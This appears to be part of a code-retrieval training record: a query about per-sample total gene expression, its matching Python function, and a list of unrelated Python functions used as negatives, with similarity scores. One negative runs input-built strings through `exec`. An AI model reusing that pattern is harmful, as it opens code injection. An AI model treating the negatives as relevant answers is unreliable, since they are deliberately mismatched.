expression.split()\n\t\tstack = []\n\t\ttry:\n\t\t\tfor e in elements:\n\t\t\t\tif not e.isdigit() and e != \")\":\n\t\t\t\t\tstack.append(e)\n\t\t\t\tif e.isdigit() and not cls.is_operator(stack[-1]):\n\t\t\t\t\tstack.append(e)\n\t\t\t\tif e.isdigit() and cls.is_operator(stack[-1]):\n\t\t\t\t\toperator = stack.pop()\n\t\t\t\t\toperand1 = stack.pop()\n\t\t\t\t\tresult = cls.apply_math_operations(float(operand1), float(e), operator)\n\t\t\t\t\tif stack[-1] == \"(\":\n\t\t\t\t\t\tstack.append(str(result))\n\t\t\t\t\telse:\n\t\t\t\t\t\traise Exception(\"invalid input\")\n\t\t\t\t\t\tbreak\n\t\t\t\tif e == \")\":\n\t\t\t\t\tvalue = stack.pop()\n\t\t\t\t\tob = stack.pop()\n\t\t\t\t\tif (ob == \"(\"):\n\t\t\t\t\t\tstack.append(str(value))\n\t\t\t\t\telif (cls.is_operator(ob)):\n\t\t\t\t\t\toperand1 = stack.pop()\n\t\t\t\t\t\tstack.pop()\n\t\t\t\t\t\tresult = cls.apply_math_operations(float(operand1), float(value), ob)\n\t\t\t\t\t\tstack.append(str(result))\n\n\t\t\tanswer = float(stack[0])\n\t\t\tlogger.info(f\"the answe is {answer}\")\n\t\t\treturn answer\n\t\texcept Exception as e:\n\t\t\traise Exception(\"Exception from the infix function\")", "def parse( self, exprlist ):\n t = self.prop[\"DSEC\"]\n E = self.prop[\"ELE\"]\n V = self.prop[\"VOL\"]\n T = self.prop[\"TEMP\"]\n C = self.prop[\"CONC\"]\n S = self.prop[\"SPEC\"]\n pH = E\n row = []\n for i in exprlist:\n i = i.replace(\"A\", \"self.absorbance\")\n exec 'row.append(' + i + ')'\n return row", "def get_quote_for_sequence_segment(\n self, sequence, segment, max_lead_time=None, **kwargs\n ):\n fragment_to_order = self.assembly_method.compute_fragment_for_sequence_segment(\n sequence=sequence, segment=segment, **kwargs\n )\n return self.supplier.get_quote(fragment_to_order, max_lead_time=max_lead_time)", "def relationalExpr( ):#MAKE SURE I USED THE RIGHT LOGIC FOR THIS\n\n\ttok = tokens.peek( )\n\tif debug: print(\"relationalExpr: \", tok)\n\tleft = addExpr( )\n\texpr = \"\"\n\ttok = tokens.peek( )\n\tif tok in relations:\n\t\trel = relation( ) # expecting a relation to start off \n\t\tright = expression( ) # if there is a relation we expect there to be an expression to the right of the relation\n\t\texpr = BinaryExpr( rel, left, right )\n\t\treturn expr #fix this for syntax tree maybe\n\n\treturn left", "def compile_expr(self, e, prec=0):\n etyp = type(e)\n\n if etyp is HIR.Const:\n if e.typ == f32:\n return (f\"{e.v}f\",[])\n elif e.typ == f64:\n return (f\"Expr({e.v})\",[])\n else:\n return (str(e.v),[])\n elif etyp is HIR.Evar:\n return (self._ctxt[e.v.name],[])\n elif etyp is HIR.Erdom:\n return (self._ctxt[e.r.name],[])\n elif etyp is HIR.Eparam:\n return (self._ctxt[e.p.name],[])\n elif etyp is HIR.BinOp:\n op_prec = HIR_CPP_String._prec[e.op]\n lhs, ls = self.compile_expr(e.lhs, prec=op_prec)\n rhs, rs = self.compile_expr(e.rhs, prec=op_prec+1)\n op = e.op\n if op == \"and\":\n op = \"&&\"\n elif op == \"or\":\n op = \"||\"\n exp = f'{lhs} {e.op} {rhs}'\n if prec > op_prec:\n exp = f'({exp})'\n return (exp,ls+rs)\n elif etyp is HIR.Min or etyp is HIR.Max:\n op = \"min\" if etyp is HIR.Min else \"max\"\n lhs, ls = self.compile_expr(e.lhs)\n rhs, rs = self.compile_expr(e.rhs)\n return (f\"{op}({lhs}, {rhs})\",ls+rs)\n elif etyp is HIR.MathFn1:\n arg, ss = self.compile_expr(e.arg)\n return (f'{e.name}({arg})',ss)\n elif etyp is HIR.Clamp:\n val, vs = self.compile_expr(e.val)\n lo, ls = self.compile_expr(e.lo)\n hi, hs = self.compile_expr(e.hi)\n return (f'clamp({val}, {lo}, {hi})',vs+ls+hs)\n elif etyp is HIR.Pow:\n base,bs = self.compile_expr(e.base)\n exp, es = self.compile_expr(e.exp)\n return (f'pow({base}, {exp})',bs+es)\n elif etyp is HIR.ATan2:\n y, ys = self.compile_expr(e.y)\n x, xs = self.compile_expr(e.x)\n return (f'atan2({y}, {x})',ys+xs)\n elif etyp is HIR.Select:\n pred,ps = self.compile_expr(e.pred)\n lhs, ls = self.compile_expr(e.lhs)\n rhs, rs = self.compile_expr(e.rhs)\n return (f'select({pred}, {lhs}, {rhs})',ps+ls+rs)\n elif etyp is HIR.FAccess:\n nm = e.f.name if type(e.f) is HIR.Func else e.f.img.name\n name = self._ctxt[nm]\n tmp = [ self.compile_expr(a) for a in e.args ]\n args = [ a[0] for a in tmp ]\n ss = [ x for a in tmp for x in a[1] ] # flatten list of lists\n return (f'{name}({\",\".join(args)})',ss)\n elif etyp is HIR.BigSum:\n stmts = []\n # RDom variable\n r = self._ctxt[e.r.name]\n\n # handle compiling the body with reduction variable substitution\n # name collisions must be handled out-of-scope\n pure_r = self.new_name(e.r.name.copy())\n self.push_scope(tab=False)\n stmts += [f\"Var {pure_r};\"]\n # but we need to hide the fact that we're re-binding the rdom\n self._ctxt[e.r.name] = pure_r\n self._curr_args = self._curr_args + [pure_r]\n args_x = ','.join(self._curr_args)\n # call body\n body,bs = self.compile_expr(e.body)\n # cleanup\n stmts += bs\n self._curr_args = self._curr_args[:-1]\n self.pop_scope(tab=False)\n\n # create an earlier temp. func corresponding to the sum values\n f0name = self.new_name(Sym(f\"sum{self._sum_count}\"))\n self._sum_count +=1\n f1name = self.new_name(Sym(f\"sum{self._sum_count}\"))\n self._sum_count +=1\n args = ','.join(self._curr_args)\n args_r = ','.join(self._curr_args+[ self._ctxt[e.r.name] ])\n stmts += [f'Func {f0name}(\"{f0name}\");',\n f'Func {f1name}(\"{f1name}\");',\n f\"{f0name}({args_x}) = {body};\",\n f\"{f1name}({args}) = Expr(0.0);\",\n f\"{f1name}({args}) += {f0name}({args_r});\"]\n return (f\"{f1name}({args})\",stmts)\n else: assert False, \"bad case\"", "def get_text(cls, quad):\n\t\ttext = ast.literal_eval(str(cls.get_address_value(quad.result)))\n\t\tx = cls.get_address_value(quad.left_operand)\n\t\ty = cls.get_address_value(quad.right_operand)\n\t\treturn [x, y, text]", "def sel2ea(*args):\n return _ida_segment.sel2ea(*args)", "def get_Ecc_n(self, eccType=\"ed\", r_power=2, order=2, where=\"\", orderBy=\"event_id\"):\n eccArray = self.getEccentricities(eccType=eccType, r_power=r_power, order=order, orderBy=orderBy)\n return eccArray[:,0] + 1j*eccArray[:,1]", "def get_exons_from_transcript(transcript_id):\n assert transcript_id in data.transcript_exons_dict, (\n \"Unknown transcript %s in a dict of size %s, \"\n \"with initial elements %s\") % (\n transcript_id,\n len(data.transcript_exons_dict),\n data.transcript_exons_dict.items()[:5])\n exons = data.transcript_exons_dict[transcript_id]\n assert len(exons) > 0, \\\n \"Couldn't find exons for transcript %s\" % transcript_id\n fields = [\n 'exon_id',\n 'seq_start',\n 'start_exon_id',\n 'seq_end',\n 'end_exon_id',\n 'stable_id_exon',\n 'seq_region_start_exon',\n 'seq_region_end_exon'\n ]\n return exons[fields]", "def get_substr(self, y, x1, x2):\n return self.lines[y][x1 : x2]", "def process_exon_line(self, line):\n kwargs = self.extract_exon_args(line)\n if not kwargs:\n return\n parent_id = kwargs['parent_id']\n if parent_id not in self.mrnas:\n self.orphans.append(line)\n return\n parent_mrna = self.mrnas[parent_id]\n if parent_mrna.exon:\n self.update_exon(line, parent_mrna.exon)\n else:\n parent_mrna.exon = Exon(**kwargs)", "def _read_expression_direct(cls):\n\n expression_data = {}\n expression_columns = cls._get_columns(EXPRESSION_MANIFEST)\n expression_psvs = cls._get_component_psvs(EXPRESSION_MANIFEST)\n\n for expression_psv in expression_psvs:\n for row in gzip.GzipFile(fileobj=io.BytesIO(cls._read_s3_url(expression_psv))):\n row_dict = dict(zip(expression_columns, row.strip().split(b'|')))\n expression_data.setdefault(\n row_dict[\"cellkey\"].decode(), {})[row_dict[\"featurekey\"].decode()] = \\\n float(row_dict[\"exrpvalue\"])\n\n return expression_data", "def lf_abnl_interp_negexsp_seizure(report):\n\n for topkey in CANDIDATE_INTERPS_LOWER:\n if topkey in report.sections.keys():\n interpretation = report.sections[topkey]\n if isinstance(interpretation, dict):\n interp_text = interpretation['text']\n else:\n interp_text = interpretation\n \n return eval_interp_with_negex(interp_text)\n\n return ABSTAIN_VAL # if can't find an interpretation then abstain", "def stuff_G(self, row_start, row_end, col_start, col_end, expr, row_stride = None):\n yield \"\"", "def Segments():\n for n in range(ida_segment.get_segm_qty()):\n seg = ida_segment.getnseg(n)\n if seg:\n yield seg.start_ea", "def return_first_and_last_exon(exons):\n lst_exons = list(exons)\n lst_exons.sort(key=int)\n return(lst_exons[0], lst_exons[-1])", "def _build_proj_equation(free_dims, bound_dims, output_dims):\n input_str = \"\"\n kernel_str = \"\"\n output_str = \"\"\n bias_axes = \"\"\n letter_offset = 0\n for i in range(free_dims):\n char = _CHR_IDX[i + letter_offset]\n input_str += char\n output_str += char\n\n letter_offset += free_dims\n for i in range(bound_dims):\n char = _CHR_IDX[i + letter_offset]\n input_str += char\n kernel_str += char\n\n letter_offset += bound_dims\n for i in range(output_dims):\n char = _CHR_IDX[i + letter_offset]\n kernel_str += char\n output_str += char\n bias_axes += char\n equation = \"%s,%s->%s\" % (input_str, kernel_str, output_str)\n\n return equation, bias_axes, len(output_str)", "def _extrapolate(self):\n maxrho = self.maxrho\n x = np.linspace(1.001, maxrho, int(self.nrho/5))\n rho1 = self.rho # rho up to 1\n dec_l = 0.01\n ni_ov = np.zeros((self.nion, len(x)), dtype=float)\n ninew = np.zeros((self.nion, self.nrho+len(x)),dtype=float)\n ne_ov1 = self.ne[self.nrho-1]*np.exp(-((x-1.)/dec_l))\n te_ov1 = self.te[self.nrho-1]*np.exp(-(x-1.)/dec_l)\n ti_ov1 = self.ti[self.nrho-1]*np.exp(-(x-1.)/dec_l)\n vt_ov1 = self.vt[self.nrho-1]*np.exp(-(x-1.)/dec_l)\n for i in range(self.nion):\n ni_ov[i,:] = self.ni[i,self.nrho-1]*np.exp(-(x-1.)/dec_l)\n ninew[i,:] = np.concatenate([self.ni[i,:], ni_ov[i,:]])\n self.ni = ninew\n self.rho = np.concatenate([rho1, x])\n self.nrho = len(rho1)+len(x)\n self.ne = np.concatenate([self.ne, ne_ov1])\n self.te = np.concatenate([self.te, te_ov1])\n self.ti = np.concatenate([self.ti, ti_ov1])\n self.vt = np.concatenate([self.vt, vt_ov1])", "def expression(self) -> Expression:\n ...", "def part(expr,address):\n for num in address:\n expr = expr.args[num]\n return expr", "def g(t1):\n if isinstance(t1, IdentExp) and self.st.has_key(t1.name):\n ninfo = self.st[t1.name]\n if ninfo[\"srcty\"] == \"vector\":\n if self.existMats and t1.name == n.exp.lhs.name:\n return ArrayRefExp(t1, IdentExp(\"i2\"))\n else:\n self.st[\"itrs\"][0].update({ninfo[\"len\"][0]: \"i1\"})\n return ArrayRefExp(t1, IdentExp(\"i1\"))\n elif ninfo[\"srcty\"] == \"matrix\":\n self.st[\"itrs\"][0].update({ninfo[\"len\"][0]: \"i1\"})\n self.st[\"itrs\"][1].update({ninfo[\"len\"][1]: \"i2\"})\n sub = s2t(\"exp\", ninfo[\"len\"][0] + \" * i2 + i1\")\n return ArrayRefExp(t1, sub)\n else:\n return t1\n else:\n return t1", "async def test_get_tx_exon_coords(test_db, nm_152263_exons):\n resp = test_db.get_tx_exon_coords(\"NM_152263.3\", nm_152263_exons, 1, 8)\n assert resp[0] == ((0, 234), (822, 892))\n assert resp[1] is None\n\n resp = test_db.get_tx_exon_coords(\"NM_152263.3\", nm_152263_exons, 1, 11)\n assert resp[0] is None\n assert resp[1] == \"Exon 11 does not exist on NM_152263.3\"", "def get_equations(self, combo=None):\n if combo is None:\n return self._equations\n else:\n return [self._equations[i] for i in self.combos[combo]]", "def _get_parts_ignore_EQU(parse_tree):\n first_part = parse_tree[0]\n second_part = parse_tree[1]\n if second_part.label() == 'EQU':\n second_part = parse_tree[2]\n\n if first_part.label() == 'SYN':\n syn = first_part\n other = second_part\n else:\n syn = second_part\n other = first_part\n\n return other, syn", "def parse_expr(self) -> SyntaxNode:\n return self._parse_cat_binary(\"S\", self.parse_term)", "def get_features_expression(self):\n \n # Get the model from cache or disk based on the model_name in request\n self._get_model_by_name()\n \n # Prepare the expression as a string\n delimiter = \" &'|'& \"\n\n # Get the complete feature definitions for this model\n features_df = self.model.original_features_df.copy()\n \n # Set features that are not expected in the features expression in Qlik\n exclude = [\"excluded\"]\n\n if not self.model.lag_target:\n exclude.append(\"target\")\n if not self.model.lags:\n exclude.append(\"identifier\")\n\n # Exclude columns that are not expected in the request data\n exclusions = features_df['variable_type'].isin(exclude)\n features_df = features_df.loc[~exclusions]\n \n # Get the feature names\n features = features_df[\"name\"].tolist()\n \n # Prepare a string which can be evaluated to an expression in Qlik with features as field names\n self.response = pd.Series(delimiter.join([\"[\" + f + \"]\" for f in features]))\n \n # Send the reponse table description to Qlik\n self._send_table_description(\"expression\")\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(4)\n \n # Finally send the response\n return self.response", "def update_exon(self, line, exon):\n args = self.extract_exon_args(line)\n exon.add_indices(args['indices'])\n exon.add_identifier(args['identifier'])\n if 'score' in args:\n exon.add_score(args['score'])", "def _eval(self, segment, parent_stack, **kwargs):\n if segment.is_type(\"select_statement\"):\n aliases = self._get_aliases_from_select(segment)\n if not aliases:\n return None\n\n # Iterate through all the references, both in the select clause, but also\n # potential others.\n sc = segment.get_child(\"select_clause\")\n reference_buffer = list(sc.recursive_crawl(\"object_reference\"))\n # Add any wildcard references\n reference_buffer += list(sc.recursive_crawl(\"wildcard_identifier\"))\n for potential_clause in (\n \"where_clause\",\n \"groupby_clause\",\n \"having_clause\",\n \"orderby_clause\",\n ):\n clause = segment.get_child(potential_clause)\n if clause:\n reference_buffer += list(clause.recursive_crawl(\"object_reference\"))\n # PURGE any references which are in nested select statements\n for ref in reference_buffer.copy():\n ref_path = segment.path_to(ref)\n # is it in a subselect? i.e. a select which isn't this one.\n if any(\n seg.is_type(\"select_statement\") and seg is not segment\n for seg in ref_path\n ):\n reference_buffer.remove(ref)\n\n # Get all column aliases\n col_aliases = []\n for col_seg in list(sc.recursive_crawl(\"alias_expression\")):\n for seg in col_seg.segments:\n if seg.is_type(\"identifier\"):\n col_aliases.append(seg.raw)\n\n # Get any columns referred to in a using clause, and extract anything\n # from ON clauses.\n using_cols = []\n fc = segment.get_child(\"from_clause\")\n for join_clause in fc.recursive_crawl(\"join_clause\"):\n in_using_brackets = False\n seen_using = False\n seen_on = False\n for seg in join_clause.segments:\n if seg.is_type(\"keyword\") and seg.name == \"USING\":\n seen_using = True\n elif seg.is_type(\"keyword\") and seg.name == \"ON\":\n seen_on = True\n elif seen_using and seg.is_type(\"start_bracket\"):\n in_using_brackets = True\n elif seen_using and seg.is_type(\"end_bracket\"):\n in_using_brackets = False\n seen_using = False\n elif in_using_brackets and seg.is_type(\"identifier\"):\n using_cols.append(seg.raw)\n elif seen_on and seg.is_type(\"expression\"):\n # Deal with expressions\n reference_buffer += list(\n seg.recursive_crawl(\"object_reference\")\n )\n\n # Work out if we have a parent select function\n parent_select = None\n for seg in reversed(parent_stack):\n if seg.is_type(\"select_statement\"):\n parent_select = seg\n break\n\n # Pass them all to the function that does all the work.\n # NB: Subclasses of this rules should override the function below\n return self._lint_references_and_aliases(\n aliases, reference_buffer, col_aliases, using_cols, parent_select\n )\n return None" ]
[ "0.5563815", "0.5293783", "0.5213351", "0.49248624", "0.49004447", "0.48478526", "0.4781561", "0.47813958", "0.4710072", "0.4675474", "0.4543498", "0.45414433", "0.45138633", "0.44763458", "0.44727144", "0.44690332", "0.4463009", "0.44608518", "0.44598845", "0.44542956", "0.44500953", "0.44333282", "0.4429923", "0.4429744", "0.44134194", "0.43991935", "0.4379504", "0.43580562", "0.435443", "0.43541926", "0.43358815", "0.4333481", "0.42984396", "0.42917535", "0.42908773", "0.42908773", "0.42892784", "0.42871898", "0.42836833", "0.4283146", "0.42744425", "0.4266373", "0.42654127", "0.42645666", "0.42576957", "0.42566288", "0.42557424", "0.42527026", "0.4221265", "0.42153218", "0.42069823", "0.42032298", "0.42013884", "0.4186482", "0.4184196", "0.41836718", "0.41781208", "0.4178088", "0.4176565", "0.4171007", "0.41650006", "0.41483182", "0.41483182", "0.41483182", "0.41476166", "0.41426983", "0.41402292", "0.4127464", "0.41228002", "0.41221514", "0.4111588", "0.41034365", "0.4097107", "0.40949774", "0.40945148", "0.4093672", "0.40926147", "0.4092118", "0.4090904", "0.40903312", "0.40903312", "0.4085974", "0.40584293", "0.40549442", "0.40530902", "0.4051325", "0.40507746", "0.40494725", "0.4047425", "0.40399706", "0.4024256", "0.40220213", "0.40191698", "0.4018539", "0.4016527", "0.4005557", "0.40029174", "0.3996928", "0.398798", "0.3986516" ]
0.56654406
0
get total reads count for the given sample and the given gene actually total_expr = reads_lengthtotal_reads_counts
def get_total_gene_expr(gene, countinfo, Idx, seg_expr, cross_graph_expr): if len(seg_expr.shape) == 1: n_samples = 1 else: n_samples = seg_expr.shape[1] if countinfo is None or Idx.sample is None: return [np.nan] * n_samples seg_len = gene.segmentgraph.segments[1] - gene.segmentgraph.segments[0] if cross_graph_expr: total_expr = np.sum(seg_len * seg_expr.T, axis=1) total_expr = total_expr.tolist() else: total_expr = [np.sum(seg_len*seg_expr)] return total_expr
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_count_total_reads(self):\n \n bam = pybedtools.BedTool(clipper.test_file(\"allup_test.bam\"))\n gene_dfn = pybedtools.BedTool(clipper.test_file(\"hg19_genes.bed\"))\n \n result = count_total_reads(bam, gene_dfn)\n \n self.assertEqual(result, 2086)", "def test_count_reads_in_region_total(self):\n self.c.skipZeros = False\n self.c.stepSize = 200\n self.c.binLength = 200\n resp, _ = self.c.count_reads_in_region(self.chrom, 0, 200)\n nt.assert_equal(resp, np.array([[2, 4.]]))", "def sum_reads(self, sample):\n total_reads = 0.0\n arts = lims.get_artifacts(samplelimsid = sample.id, process_type = self.process_types)\n for art in arts:\n if art.qc_flag == 'PASSED' and '# Reads' in art.udf:\n total_reads += float(art.udf.get('# Reads'))\n return total_reads/1000000", "def readlen_cnts(store, filter_srrs=None, keep_srrs=None):\n df = store['prealn/workflow/fastq'].copy()\n df.reset_index(inplace=True)\n df = remove_rows(df, 'srr', filter_srrs)\n df = keep_rows(df, 'srr', keep_srrs)\n df['len'] = df[['avgLen_R1', 'avgLen_R2']].max(axis=1)\n\n return df.len.min(), df.len.median(), df.len.mode().iloc[0], df.len.max()", "def reads_in_chromosome(self, chromosome):\n return sum(m.read_info(self.dataset_name).total_read_count \n for m in self.dataset if m.position not in SPECIAL_POSITIONS.all_undefined and m.position.chromosome==chromosome)", "def gatherReadCounts(samplesList, scriptsDir, threads, alignmentPath, outRoot, stype, mode):\n reads = 0\n ext = \".pruned.bam\"\n if mode == \"all_reads\":\n ext = \".bam\"\n for i in range(len(samplesList)):\n bam = os.path.join(alignmentPath, outRoot) + \".\" + stype + \".\" + str(i) + ext\n reads += int(subprocess.run([os.path.join(scriptsDir, \"get_readcount.sh\"), bam, str(threads)], capture_output=True, text=True).stdout.strip(\"\\n\"))\n return reads", "def count_total(self):\n total = 0\n rpk_total = 0.0\n with open(self.filename, 'rU') as my_htseq:\n for line in my_htseq:\n if '_' not in line:\n line = line.rstrip('\\n').split('\\t')\n ensg_id = line[0]\n gene_len = len(set(self.gtf.gene_coords[ensg_id])) / 1000.0\n count = int(line[1])\n total += count\n rpk_total += float(count/gene_len)\n return total, rpk_total", "def get_read_len(wildcards):\n read_len = caseinfo.loc[(wildcards.sample, wildcards.unit), \"read_len\"]\n return int(read_len)", "def test_count_reads_in_region_extension_1(self):\n self.c = cr.CountReadsPerBin([self.bamFile1, self.bamFile2],\n binLength=1,\n stepSize=50,\n extendReads=25)\n\n resp, _ = self.c.count_reads_in_region(self.chrom, 0, 200)\n\n nt.assert_equal(resp, np.array([[0, 0.],\n [0, 1.],\n [1, 1.],\n [1, 2.]]))", "def feature_total_lengths(genefile, ignore_multiple_splice_variants=False, genome_fasta_file=DEFAULT_NUCLEAR_GENOME_FILE):\n # BCBio uses 0-based and end-exclusive positions (first-third base is bases 0,1,2, i.e range 0-3), so length is straightforward\n feature_total_lengths = defaultdict(int)\n total_genome_length = 0\n # get the total chromosome lengths from genome_fasta_file if given - needed to calculate total intergenic length \n if genome_fasta_file:\n with open(genome_fasta_file) as FASTAFILE: fasta_seq_dict = SeqIO.to_dict(SeqIO.parse(FASTAFILE, \"fasta\"))\n else: fasta_seq_dict = {}\n with open(os.path.expanduser(genefile)) as GENEFILE:\n for chromosome_record in GFF.parse(GENEFILE, base_dict=fasta_seq_dict):\n total_genome_length += len(chromosome_record.seq)\n for gene_record in chromosome_record.features:\n gene_length = gene_record.location.end.position - gene_record.location.start.position\n feature_total_lengths['gene'] += gene_length\n if len(gene_record.sub_features) == 0:\n raise NoRNAError(\"Gene %s has no RNA - can't determine CDS start/end!\"%gene_record.id)\n if len(gene_record.sub_features) > 1:\n if ignore_multiple_splice_variants: \n feature_total_lengths['MULTIPLE_SPLICE_VARIANTS'] += gene_length\n continue\n else: \n raise MultipleRNAError(\"Gene %s has multiple RNAs - can't determine single CDS start/end!\"%gene_record.id)\n else:\n features = gene_record.sub_features[0].sub_features\n for feature in features:\n feature_total_lengths[feature.type] += (feature.location.end.position - feature.location.start.position)\n # calculate total intron length from total gene and exon/UTR length\n feature_total_lengths['intron'] = feature_total_lengths['gene'] - sum(length for feature,length \n in feature_total_lengths.items() if feature != 'gene')\n # calculate total intergenic length from total genome and gene length\n feature_total_lengths['all'] = total_genome_length\n feature_total_lengths['intergenic'] = total_genome_length - feature_total_lengths['gene']\n return dict(feature_total_lengths)", "def get_total_coverage(bam_file, outfile):\n # Run samtools idxstats (this get the coverage for all transcripts:\n # assigne the outfile with the temp folder to keep thing more tidy\n oufile_dir_file = os.path.join(\"temp_reads_per_base\",\n outfile)\n cmd = \" \".join(['samtools',\n 'idxstats',\n bam_file,\n '>',\n oufile_dir_file])\n # data was saved in idxstats_filename\n # call the func\n pipe = subproces_func(cmd)\n # creat a dictioanry to hold all the total expression values for the\n # transcripts.\n overall_expression_dic = dict()\n with open(oufile_dir_file, \"r\") as handle:\n for line in handle:\n data = line.rstrip(\"\\n\").split(\"\\t\")\n transcript = data[0]\n overall_expression_dic[transcript] = [int(x) for x in data[1:]]\n # print overall_expression_dic[\"Mp_O_20647_c0_seq2\"]\n # returns a dictionary: key[transcript], vals = ['577', '274', '0'] len,\n # reads_mapped, last_coloumn\n return overall_expression_dic", "def count_samples(self):\n return sum(SEQ_LENGTHS)", "def get_read_length(read_fn, n_read=10000):\n with GzipFile(read_fn, mode='rb') as f:\n h = SeqIO.QualityIO.FastqGeneralIterator(f)\n i = 0\n l = []\n while i < n_read:\n try:\n t = h.next()\n l.append(len(t[1]))\n i += 1\n except StopIteration:\n logger.warning(\"Requested %d reads but reached the end of the file after %d\", n_read, i)\n return int(np.round(np.mean(l)))", "def countgenes():\n directory = openfile('db_directory.txt')\n no_genes_file = directory+'GENES_IN_HPO.txt'\n GENES_IN_HPO = openfile(no_genes_file)\n #GENES_IN_HPO = openfile(numbergenes_file)\n return int(GENES_IN_HPO)", "def _get_total_read_size(self):\n if self.read_size:\n read_size = EVENT_SIZE * self.read_size\n else:\n read_size = EVENT_SIZE\n return read_size", "def countReadCoverage(bam,chrom,start,end,strand=None):\n\n coverage = []\n start = int(start)\n end = int(end)\n for i in range(end-start+1):\n coverage.append(0.0)\n\n i = 0\n if chrom in bam.references:\n for pcol in bam.pileup(chrom,start,end):\n n = 0\n if pcol.pos >= start and pcol.pos <= end:\n for read in pcol.pileups:\n if strand == '+':\n if not read.alignment.is_reverse and read.alignment.mapq >= 0 and not read.alignment.is_duplicate:\n n += 1\n elif strand == '-':\n if read.alignment.is_reverse and read.alignment.mapq >= 0 and not read.alignment.is_duplicate:\n n += 1\n else:\n if read.alignment.mapq >= 0 and not read.alignment.is_duplicate:\n n += 1\n coverage[i] = n\n i += 1\n\n return coverage", "def get_total_hits(records_blob):\n hits_tag = records_blob.getElementsByTagName('totalHits')[0]\n return int(hits_tag.firstChild.nodeValue)", "def get_number_seqs_for_primer(percent_match,\n seq_count):\n \n total_seq_use=int((1-percent_match)*seq_count)\n \n return total_seq_use", "def GetNumSamples(trrecord, samplelists=[]):\n if len(samplelists) == 0: samplelists.append(None)\n return [sum(trrecord.GetGenotypeCounts(samplelist=sl).values()) for sl in samplelists]", "def total(**metafilter):\n metafilter = _clean(metafilter)\n search = _build(metafilter)\n return search.count()", "def count_seqs_from_file(fasta_file, parser=parse_fasta):\r\n result = 0\r\n lens = []\r\n for record in parser(fasta_file):\r\n result += 1\r\n lens.append(len(record[1]))\r\n if result == 0:\r\n return result, None, None\r\n else:\r\n return result, mean(lens), std(lens)", "def total_number():\r\n total_number = 0\r\n file_read = read_file()\r\n for key in file_read:\r\n total_number = total_number + len(file_read[key])\r\n return total_number", "def query_coverage(self):\n s = self.query_aln.replace(\"=\", \"\")\n return len(s)", "def average_length_of_gene(self):\n return sum([len(e) for e in self.population]) / len(self.population)", "def count_number_of_reads(filename: Path) -> int:\n\tif filename.suffix == '.gz':\n\t\tcommand = f\"zcat {filename}\"\n\telse:\n\t\tcommand = f\"cat {filename}\"\n\tprocess = subprocess.Popen(command.split(), stdout = subprocess.PIPE)\n\toutput = subprocess.check_output([\"wc\", \"-l\"], stdin = process.stdout)\n\n\treads = int(output.strip()) / 4\n\treturn int(reads)", "def count(self, sub, start=0, end=None):\n return count(self, sub, start, end)", "def count_single_mirbase_reads(bam, counts_file):\n count_ref_hits(bam, counts_file)", "def count(self, *columns):\n if not columns:\n columns = ['*']\n\n return int(self.aggregate('count', *columns))", "def GetSampleCount(self) :\r\n\t\tCurSampleCount = 0\r\n\t\ttry :\r\n\t\t\tself.DB_Cursor.execute(self.SQLCMDs['SampleCount'])\r\n\t\t\tCurSampleCount = self.DB_Cursor.fetchone()[0]\r\n\t\texcept Exception as detail:\r\n\t\t\tlogging.error(\"Failed to get count of samples in database: %s\"%detail)\r\n\t\treturn CurSampleCount", "def count_total(\n reference_seq, # type: pyfaidx.Sequence\n pattern=None, # type: str\n intervals=None # type: Iterable[Tuple[str, int, int]]\n): # type: (...) -> int\n\n regex = _build_regex(pattern)\n\n if intervals is None:\n # Simply count for the entire sequence.\n count = sum(_count_sequence(reference_seq[seq], regex=regex)\n for seq in reference_seq.keys()) # yapf: disable\n else:\n # Flatten intervals, and then only count for sequences\n # within the flattened intervals.\n merged_intervals = list(merge_genomic_intervals(intervals))\n\n seqs = [\n reference_seq[chrom][start:end]\n for chrom, start, end in merged_intervals\n ]\n\n count = sum(_count_sequence(seq, regex=regex) for seq in seqs)\n\n return count", "def getSampleCount(self,study_id):\n try:\n con = self.getMetadataDatabaseConnection()\n results = con.cursor()\n count=0\n results=con.cursor().callproc('get_sample_count', [study_id,\\\n count])\n \n return results[1]\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), e)\n return False", "def count(self, base):\n return self._dna.count(base)", "def get_total_number_of_documents(self):\n return self.total_number_of_documents", "def test_get_coverage_of_region_split_read(self):\n\n # turn of read extension\n self.c.extendPairedEnds = False\n self.c.bamFilesList = [self.bamFile1]\n self.c.binLength = 10\n self.c.stepSize = 10\n resp, _ = self.c.count_reads_in_region('chr_cigar', 0, 100)\n nt.assert_array_equal(resp, np.array([[0.],\n [1.],\n [1.],\n [0.],\n [1.],\n [0.],\n [0.],\n [0.],\n [0.],\n [0.]]))", "def total_samples(self):\n\n totals = self.recording_data()['totals']\n return totals[0] + totals[1]", "def total_record_count(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"total_record_count\")", "def count(self):\n\t\treturn sum(read.copy for read in self.__iter__())", "def get_num_samples(org_dir, file_names):\n count = 0\n # Loop through the files, which then loop through the trees\n for filename in file_names:\n # Skip files that are not .mrg\n if not filename.endswith('.mrg'):\n continue\n # File is .mrg. Start processing\n file_dir = os.path.join(org_dir, filename)\n with open(file_dir, 'r', encoding='utf-8') as reader:\n content = reader.readlines()\n for _ in content:\n count += 1\n\n return count", "def compute_ave_score_w_sample(genes, samples):\n\n scores = np.zeros(len(genes), dtype=np.uint32)\n\n for i, v in enumerate(genes):\n for j in samples:\n score, _ = run_duel(v, j)\n scores[i] += score\n continue\n continue\n\n return scores / len(samples)", "def getTotalNumRRI(self):\n return self.analyze.tg_ecg_get_total_rri_count()", "def cellranger_counts(fname, genome=\"matrix\"):\n with tables.open_file(fname, \"r\") as f:\n try:\n group = f.get_node(f.root, genome)\n except tables.NoSuchNodeError:\n print(\"That genome does not exist in this file.\")\n return None\n gene_ids = getattr(group, \"features/id\").read()\n barcodes = getattr(group, \"barcodes\").read()\n data = getattr(group, \"data\").read()\n indices = getattr(group, \"indices\").read()\n indptr = getattr(group, \"indptr\").read()\n shape = getattr(group, \"shape\").read()\n\n matrix = sp_sparse.csc_matrix((data, indices, indptr), shape=shape)\n gene_ids = np.array([x.decode() for x in gene_ids])\n barcodes = np.array([x.decode().replace(\"-1\", \"\") for x in barcodes])\n\n return CellRangerCounts(matrix, gene_ids, barcodes)", "def count_total_mutations(seqs, database):\n total = 0\n for seq in seqs:\n total += count_minimum_mutations(seq, database)\n return total", "def get_num_passes_from_example(example):\n assert len(\n example.features.feature['subreads/num_passes'].int64_list.value) == 1\n return 